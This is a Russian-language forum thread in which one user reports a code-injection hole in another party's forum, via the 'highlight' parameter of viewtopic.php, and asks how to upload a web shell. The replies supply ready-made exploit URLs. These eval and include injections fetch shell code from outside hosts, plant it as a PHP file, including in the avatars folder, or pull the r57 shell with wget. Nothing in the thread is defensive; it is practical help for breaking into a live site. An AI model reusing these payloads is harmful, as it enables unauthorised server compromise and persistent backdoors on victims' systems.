ДОрогие друзья я нашол форум с дырой по запросу http://сайт/forum/viewtopic.php?t=161&cmd=phpinfo();&highlight='.eval($HTTP_GET_VARS[cmd]).' phpinfo выдал система System Windows NT SUPPORT 5.0 build 2195 FTP support enabled PATH_TRANSLATED D:\www\www2\forum\viewtopic.php SystemRoot C:\WINNT TEMP C:\WINNT\TEMP TMP C:\WINNT\TEMP USERPROFILE C:\Documents and Settings\Default User windir C:\WINNT MySQL Support enabled Active Persistent Links 0 Active Links 1 Client API version 3.23.49 возможно ли залить шелл и если да то как помогите пожалуйста
А если попробывать такой командой? http://site/forum/viewtopic.php?t=161&cmd=http://eraserevil.pp.net.ua/_ld/0/87_SiJ.txt&highlight='.include($HTTP_GET_VARS[cmd]).'
к сожелению команда http://site/forum/viewtopic.php?t=161&cmd=http://eraserevil.pp.net.ua/_ld/0/87_SiJ.txt&highlight='.include($HTTP_GET_VARS[cmd]).' не работает
пробуй сразу http://сайт/forum/viewtopic.php?t=161&cmd=echo ^<? @include(http://site.ru/youshell.php); ?^> >> fuck.php&highlight='.eval($HTTP_GET_VARS[cmd]).' либо для твоего случая можно попробовать в папку с авами закинуть http://сайт/forum/viewtopic.php?t=161&cmd=echo ^<? @include(http://site.ru/youshell.php); ?^> >> D:\www\www2\forum\images\avatars\fuck.php&highlight='.eval($HTTP_GET_VARS[cmd]).' обязательно с символом ^ если что не получится пиши сюда.
Спосибо тебе за ответ! но я всё перепробывал что ты сказал пишет Internal Server Error The server encountered an internal error or misconfiguration and was unable to complete your request.
http://сайт/forum/viewtopic.php?t=161&cmd=wget http://pathofshell//r57.txt;&highlight='.eval($HTTP_GET_VARS[cmd]).' paprobay vot tak
